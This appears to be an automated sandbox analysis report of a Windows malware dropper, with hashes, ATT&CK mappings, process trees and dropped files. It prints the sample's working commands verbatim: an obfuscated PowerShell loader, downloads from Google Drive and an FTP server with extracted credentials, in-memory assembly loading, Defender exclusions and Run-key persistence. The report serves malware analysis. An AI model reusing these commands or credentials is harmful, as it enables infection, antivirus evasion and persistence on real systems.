e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711

General

Target

e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
Size

504KB
MD5

8b7ed745bf0d5f0eaa43940d9cdeab37
SHA1

2916a90ce784cc380c03828dc5a15907d490be42
SHA256

e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711
SHA512

c731b0688ad792e4448ce6bd882a288757a949fd1cf645a6d93b36d1a1a4689f6e7f843edb1660bf0a63774ee795e054e4d443655f7144ac4a3fa35ad1737df3
SSDEEP

12288:TLMEalqxXblqoRX5qbfphLxaOdRSRW4H4444Cbm:HqaXNabfphLxaSRSRW4H4444Cbm

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
8	2600	powershell.exe
16	2600	powershell.exe
18	2600	powershell.exe
20	2600	powershell.exe
22	2600	powershell.exe
23	2600	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4908	powershell.exe
4904	powershell.exe
5084	powershell.exe
4528	powershell.exe
4872	powershell.exe
2600	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_omy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\gelso.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\__tmp_rar_sfx_access_check_240632546	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File created	C:\Program Files\Dados dos hospedes.vbs	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File opened for modification	C:\Program Files\Dados dos hospedes.vbs	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File opened for modification	C:\Program Files\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4872	powershell.exe
4872	powershell.exe
2600	powershell.exe
2600	powershell.exe
2600	powershell.exe
4904	powershell.exe
4908	powershell.exe
4908	powershell.exe
4904	powershell.exe
5084	powershell.exe
5084	powershell.exe
4528	powershell.exe
4528	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4872	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	4528	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2660 wrote to memory of 2900	2660	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe	82
PID 2660 wrote to memory of 2900	2660	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe	82
PID 2900 wrote to memory of 4872	2900	WScript.exe	83
PID 2900 wrote to memory of 4872	2900	WScript.exe	83
PID 4872 wrote to memory of 2600	4872	powershell.exe	85
PID 4872 wrote to memory of 2600	4872	powershell.exe	85
PID 2600 wrote to memory of 4908	2600	powershell.exe	88
PID 2600 wrote to memory of 4908	2600	powershell.exe	88
PID 2600 wrote to memory of 4904	2600	powershell.exe	89
PID 2600 wrote to memory of 4904	2600	powershell.exe	89
PID 2600 wrote to memory of 1300	2600	powershell.exe	90
PID 2600 wrote to memory of 1300	2600	powershell.exe	90
PID 2600 wrote to memory of 5084	2600	powershell.exe	93
PID 2600 wrote to memory of 5084	2600	powershell.exe	93
PID 2600 wrote to memory of 4528	2600	powershell.exe	94
PID 2600 wrote to memory of 4528	2600	powershell.exe	94
PID 2600 wrote to memory of 2516	2600	powershell.exe	95
PID 2600 wrote to memory of 2516	2600	powershell.exe	95

C:\Users\Admin\AppData\Local\Temp\e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
"C:\Users\Admin\AppData\Local\Temp\e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2660
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files\Dados dos hospedes.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$IvwMW = 'OwB9四いуDs四いуKQ四いуg四いуCk四いуI四いу四いуn四いуDE四いуZQB1四いуHI四いуd四いу四いуn四いуC四いу四いуL四いу四いуg四いуGU四いуagB3四いуHo四いуa四いу四いуk四いуC四いу四いуL四いу四いуg四いуCc四いуa四いуB0四いуHQ四いуc四いуBz四いуDo四いуLw四いуv四いуH四いу四いуYQBz四いуHQ四いуYgBp四いуG4四いуLgBu四いуGU四いуd四いу四いуv四いуHI四いуYQB3四いуC8四いуMw四いуx四いуD四いу四いуO四いу四いуy四いуDQ四いуLQ四いу1四いуD四いу四いуNg四いуn四いуC四いу四いуK四いу四いуg四いуF0四いуXQBb四いуHQ四いуYwBl四いуGo四いуYgBv四いуFs四いуI四いу四いуs四いуC四いу四いуb四いуBs四いуHU四いуbg四いуk四いуC四いу四いуK四いуBl四いуGs四いуbwB2四いуG4四いуSQ四いуu四いуCk四いуI四いу四いуn四いуEk四いуVgBG四いуHI四いуc四いу四いуn四いуC四いу四いуK四いуBk四いуG8四いуa四いуB0四いуGU四いуTQB0四いуGU四いуRw四いуu四いуCk四いуJw四いуx四いуHM四いуcwBh四いуGw四いуQw四いуu四いуDM四いуeQBy四いуGE四いуcgBi四いуGk四いуT四いуBz四いуHM四いуYQBs四いуEM四いуJw四いуo四いуGU四いуc四いуB5四いуFQ四いуd四いуBl四いуEc四いуLg四いуp四いуC四いу四いуSQBv四いуH四いу四いуbQBQ四いуCQ四いуI四いу四いуo四いуGQ四いуYQBv四いуEw四いуLgBu四いуGk四いуYQBt四いуG8四いуR四いуB0四いуG4四いуZQBy四いуHI四いуdQBD四いуDo四いуOgBd四いуG4四いуaQBh四いуG0四いуbwBE四いуH四いу四いуc四いуBB四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWw四いу7四いуCk四いуI四いу四いуp四いуC四いу四いуJwBB四いуCc四いуI四いу四いуs四いуC四いу四いуJwCTITo四いуkyEn四いуC四いу四いуK四いуBl四いуGM四いуYQBs四いуH四いу四いуZQBS四いуC4四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いуg四いуCg四いуZwBu四いуGk四いуcgB0四いуFM四いуN四いу四いу2四いуGU四いуcwBh四いуEI四いуbQBv四いуHI四いуRg四いу6四いуDo四いуXQB0四いуHI四いуZQB2四いуG4四いуbwBD四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWw四いуg四いуD0四いуI四いуBJ四いуG8四いуc四いуBt四いуF四いу四いуJ四いу四いуg四いуF0四いуXQBb四いуGU四いуd四いуB5四いуEI四いуWw四いу7四いуCc四いуJQBJ四いуGg四いуcQBS四いуFg四いуJQ四いуn四いуC四いу四いуPQ四いуg四いуGU四いуagB3四いуHo四いуa四いу四いуk四いуDs四いуKQ四いуg四いуGc四いуUwB6四いуEM四いуQgBs四いуCQ四いуI四いу四いуo四いуGc四いуbgBp四いуHI四いуd四いуBT四いуGQ四いуYQBv四いуGw四いуbgB3四いуG8四いуR四いу四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуC四いу四いуPQ四いуg四いуGc四いуUwB6四いуEM四いуQgBs四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQ四いуo四いуGU四いуcwBv四いуH四いу四いуcwBp四いуGQ四いуLgBB四いуHY四いуSgBT四いуEk四いуJ四いу四いу7四いуCk四いуI四いу四いуn四いуHQ四いуe四いуB0四いуC4四いуMQ四いуw四いуEw四いуT四いуBE四いуC8四いуMQ四いуw四いуC8四いуcgBl四いуHQ四いуc四いуB5四いуHI四いуYwBw四いуFU四いуLwBy四いуGI四いуLgBt四いуG8四いуYw四いуu四いуHQ四いуYQBy四いуGI四いуdgBr四いуGM四いуcwBl四いуGQ四いуLgBw四いуHQ四いуZgB四いу四いуDE四いуd四いуBh四いуHI四いуYgB2四いуGs四いуYwBz四いуGU四いуZ四いу四いуv四いуC8四いуOgBw四いуHQ四いуZg四いуn四いуC四いу四いуK四いуBn四いуG4四いуaQBy四いуHQ四いуUwBk四いуGE四いуbwBs四いуG4四いуdwBv四いуEQ四いуLgBB四いуHY四いуSgBT四いуEk四いуJ四いу四いуg四いуD0四いуI四いуBn四いуFM四いуegBD四いуEI四いуb四いу四いуk四いуDs四いуKQ四いуn四いуE四いу四いуQ四いуBw四いуEo四いуO四いу四いу3四いуDU四いуMQ四いуy四いуG8四いуcgBw四いуHI四いуZQBw四いуG8四いуb四いуBl四いуHY四いуZQBk四いуCc四いуL四いу四いуn四いуDE四いуd四いуBh四いуHI四いуYgB2四いуGs四いуYwBz四いуGU四いуZ四いу四いуn四いуCg四いуb四いуBh四いуGk四いуd四いуBu四いуGU四いуZ四いуBl四いуHI四いуQwBr四いуHI四いуbwB3四いуHQ四いуZQBO四いуC4四いуd四いуBl四いуE4四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUw四いуg四いуHQ四いуYwBl四いуGo四いуYgBv四いуC0四いуdwBl四いуG4四いуI四いу四いу9四いуC四いу四いуcwBs四いуGE四いуaQB0四いуG4四いуZQBk四いуGU四いуcgBD四いуC4四いуQQB2四いуEo四いуUwBJ四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いу7四いуDI四いуMQBz四いуGw四いуV四いу四いу6四いуDo四いуXQBl四いуH四いу四いуeQBU四いуGw四いуbwBj四いуG8四いуd四いуBv四いуHI四いуU四いуB5四いуHQ四いуaQBy四いуHU四いуYwBl四いуFM四いуLgB0四いуGU四いуTg四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуFs四いуI四いу四いу9四いуC四いу四いуb四いуBv四いуGM四いуbwB0四いуG8四いуcgBQ四いуHk四いуd四いуBp四いуHI四いуdQBj四いуGU四いуUw四いу6四いуDo四いуXQBy四いуGU四いуZwBh四いуG4四いуYQBN四いуHQ四いуbgBp四いуG8四いуU四いуBl四いуGM四いуaQB2四いуHI四いуZQBT四いуC4四いуd四いуBl四いуE4四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуDs四いуfQBl四いуHU四いуcgB0四いуCQ四いуew四いуg四いуD0四いуI四いуBr四いуGM四いуYQBi四いуGw四いуb四いуBh四いуEM四いуbgBv四いуGk四いуd四いуBh四いуGQ四いуaQBs四いуGE四いуVgBl四いуHQ四いуYQBj四いуGk四いуZgBp四いуHQ四いуcgBl四いуEM四いуcgBl四いуHY四いуcgBl四いуFM四いуOg四いу6四いуF0四いуcgBl四いуGc四いуYQBu四いуGE四いуTQB0四いуG4四いуaQBv四いуF四いу四いуZQBj四いуGk四いуdgBy四いуGU四いуUw四いуu四いуHQ四いуZQBO四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWwB7四いуC四いу四いуZQBz四いуGw四いуZQB9四いуC四いу四いуZg四いуv四いуC四いу四いуM四いу四いуg四いуHQ四いуLw四いуg四いуHI四いуLw四いуg四いуGU四いуe四いуBl四いуC4四いуbgB3四いуG8四いуZ四いуB0四いуHU四いуa四いуBz四いуC四いу四いуOw四いуn四いуD四いу四いуO四いу四いуx四いуC四いу四いуc四いуBl四いуGU四いуb四いуBz四いуCc四いуI四いуBk四いуG4四いуYQBt四いуG0四いуbwBj四いуC0四いуI四いуBl四いуHg四いуZQ四いуu四いуGw四いуb四いуBl四いуGg四いуcwBy四いуGU四いуdwBv四いуH四いу四いуOw四いуg四いуGU四いуYwBy四いуG8四いуZg四いуt四いуC四いу四いуKQ四いуg四いуCc四いуc四いуB1四いуHQ四いуcgBh四いуHQ四いуUwBc四いуHM四いуbQBh四いуHI四いуZwBv四いуHI四いуU四いуBc四いуHU四いуbgBl四いуE0四いуI四いуB0四いуHI四いуYQB0四いуFM四いуX四いуBz四いуHc四いуbwBk四いуG4四いуaQBX四いуFw四いуd四いуBm四いуG8四いуcwBv四いуHI四いуYwBp四いуE0四いуX四いуBn四いуG4四いуaQBt四いуGE四いуbwBS四いуFw四いуYQB0四いуGE四いуR四いуBw四いуH四いу四いуQQBc四いуCc四いуI四いу四いуr四いуC四いу四いуRgBH四いуHI四いуVQBB四いуCQ四いуI四いу四いуo四いуC四いу四いуbgBv四いуGk四いуd四いуBh四いуG4四いуaQB0四いуHM四いуZQBE四いуC0四いуI四いу四いуn四いуCU四いуSQBo四いуHE四いуUgBY四いуCU四いуJw四いуg四いуG0四いуZQB0四いуEk四いуLQB5四いуH四いу四いуbwBD四いуC四いу四いуOw四いуg四いуHQ四いуcgBh四いуHQ四いуcwBl四いуHI四いуbwBu四いуC8四いуI四いуB0四いуGU四いуaQB1四いуHE四いуLw四いуg四いуFE四いуQQBq四いуHo四いуSQ四いуg四いуGU四いуe四いуBl四いуC4四いуYQBz四いуHU四いуdw四いуg四いуGU四いуe四いуBl四いуC4四いуb四いуBs四いуGU四いуa四いуBz四いуHI四いуZQB3四いуG8四いуc四いу四いуg四いуDs四いуKQ四いуn四いуHU四いуcwBt四いуC4四いуbgBp四いуHc四いуc四いуBV四いуFw四いуJw四いуg四いуCs四いуI四いуBw四いуGo四いуT四いуBq四いуE0四いуJ四いу四いуo四いуC四いу四いуPQ四いуg四いуFE四いуQQBq四いуHo四いуSQ四いу7四いуCk四いуI四いуBl四いуG0四いуYQBO四いуHI四いуZQBz四いуFU四いуOg四いу6四いуF0四いуd四いуBu四いуGU四いуbQBu四いуG8四いуcgBp四いуHY四いуbgBF四いуFs四いуI四いу四いуr四いуC四いу四いуJwBc四いуHM四いуcgBl四いуHM四いуVQBc四いуDo四いуQw四いуn四いуCg四いуI四いу四いу9四いуC四いу四いуRgBH四いуHI四いуVQBB四いуCQ四いуOw四いуp四いуCc四いуdQBz四いуG0四いуLgBu四いуGk四いуdwBw四いуFU四いуX四いу四いуn四いуC四いу四いуKw四いуg四いуH四いу四いуagBM四いуGo四いуTQ四いуk四いуC四いу四いуL四いуBC四いуEs四いуT四いуBS四いуFU四いуJ四いу四いуo四いуGU四いуb四いуBp四いуEY四いуZ四いуBh四いуG8四いуb四いуBu四いуHc四いуbwBE四いуC4四いуSQBl四いуHk四いуVgBt四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEk四いуZQB5四いуFY四いуbQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEk四いуZQB5四いуFY四いуbQ四いуk四いуDs四いуfQ四いу7四いуC四いу四いуKQ四いуn四いуHQ四いуTwBM四いуGM四いуXwBL四いуGE四いуMwBa四いуGY四いуbwBY四いуDI四いуSgBK四いуHI四いуVgBo四いуG0四いуVg四いу5四いуGM四いуbQ四いу5四いуFg四いуcwB1四いуFg四いуbQBq四いуDE四いуZw四いуx四いуCc四いуI四いу四いуr四いуC四いу四いуU四いуBw四いуFY四いуaQBz四いуCQ四いуK四いу四いуg四いуD0四いуI四いуBQ四いуH四いу四いуVgBp四いуHM四いуJ四いуB7四いуC四いу四いуZQBz四いуGw四いуZQB9四いуDs四いуI四いу四いуp四いуCc四いуMg四いу0四いуHU四いуW四いуBK四いуFQ四いуcQBh四いуG0四いуZwB5四いуE0四いуd四いуBG四いуHo四いуYQBr四いуF四いу四いуUg四いуx四いуHE四いуXwBJ四いуHY四いуRwBp四いуFg四いуTgBk四いуHE四いуYQBO四いуDE四いуJw四いуg四いуCs四いуI四いуBQ四いуH四いу四いуVgBp四いуHM四いуJ四いуAoACAAPQAgAFAAcABWAGkAcwAkAHsAIAApACAASgBpAHAAWABxACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABKAGkAcABYAHEAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAIABlAHAAcQBVAGgAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABlAHAAcQBVAGgAJAAgADsA';$rTgKn = $IvwMW.replace('四いу' , 'A') ;$wppON = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $rTgKn ) ); $wppON = $wppON[-1..-$wppON.Length] -join '';$wppON = $wppON.replace('%XRqhI%','C:\Program Files\Dados dos hospedes.vbs');powershell $wppON
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $hUqpe = $host.Version.Major.Equals(2) ;if ( $hUqpe ) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$qXpiJ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qXpiJ ) {$siVpP = ($siVpP + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$siVpP = ($siVpP + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mVyeI = (New-Object Net.WebClient);$mVyeI.Encoding = [System.Text.Encoding]::UTF8;$mVyeI.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Program Files\Dados dos hospedes.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$ISJvA = (New-Object Net.WebClient);$ISJvA.Encoding = [System.Text.Encoding]::UTF8;$ISJvA.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $ISJvA.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$ISJvA.dispose();$ISJvA = (New-Object Net.WebClient);$ISJvA.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $ISJvA.DownloadString( $lBCzSg );$hzwje = 'C:\Program Files\Dados dos hospedes.vbs';[Byte[]] $PmpoI = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $PmpoI ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '605-428013/war/ten.nibtsap//:sptth' , $hzwje , 'true1' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2600
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4904
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
        5⤵
        
        PID:1300
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\gelso.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4528
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c del "C:\Program Files\Dados dos hospedes.vbs"
        5⤵
        
        PID:2516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Dados dos hospedes.vbs

Filesize
681KB

MD5
91f673cf4f5d5b787e55304a8618a6c8

SHA1
d5c1ab75ac7b7faed860caba7df5f0cad998ef28

SHA256
c376a309893167d768244df15d8c01b335182f7d3c806d5373c4bd09367e9156

SHA512
3d0a872108ee86c2bf3dd394712b1449cdd635df369300bb80650fbfd13bf8f423c84a3a8fdbae2e6bc6cb46475bd6f8144703da85648c740bb2d0da5c548e1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\gelso.ps1

Filesize
68KB

MD5
841642cd9fdd089c2c8681bcc4ba6c4f

SHA1
1995797d53d662301a6c410f14ad24cee66be2af

SHA256
7943e3dc742f1a197bd2e5e76c97fef8b4f48495091cde60778a8c1405e4405f

SHA512
d3cd7104b40bf0956ddca6a3d1d807f856fcc6a7456144d443afd391b33fb51acc77dd54b314860c02ade5662f85cd825deaa39dbbf1157d8f47816c246b656d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
3f247caff4cc32a9bde90ba03d071fe1

SHA1
587c3f046a41ad1f3ad453d2feed3417509f9381

SHA256
e8f861a0064d885a522730f3194377910b81b062c4cac30e2d1a249451290b57

SHA512
2fac3fbd301347b50c30eab17e99f1937f7029fce93fdbe15e5bbb677b622cb14d8904c6359b17d5bcfc9b9bb8b8b3ec3dc3cb5fb73e0928f321b26a5187d68d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
76692775e4781f0c9f0092f5804cfdb1

SHA1
6740e4e4110028c62282ee1e7eb8be576a2bc23a

SHA256
0c451ff3823450d544066237cbfb08556b7ca36c4a0ea085055f69ab35795b00

SHA512
6e0731e3736594d9e86da2fc33e08a663f29100074cc8d46e2716123c946b9eb150c804c7cf8428cac631e1cff984663d41ce3b5e1e77965bd8e2ecf0742af34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6d7ef40ac9609239ca2af0da435bc39a

SHA1
ea26573c53311f55f2dc28cacbf63a0eede5a925

SHA256
66a82d4d69d0d71a8e39426494bca1db11721eb552d6b800b32ed2a3f74f6515

SHA512
2d7daf89ccda28987e51f73c4dac5d51e6dcc45a582a2f6b426f2378743ea13259e026ddc53844fcbb593ce0f4e4bca4593d95891a65628a3fbe8147fd63c02e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c1a54dd5a1ab44cc4c4afd42f291c863

SHA1
b77043ab3582680fc96192e9d333a6be0ae0f69d

SHA256
c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

SHA512
010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

Download Submit
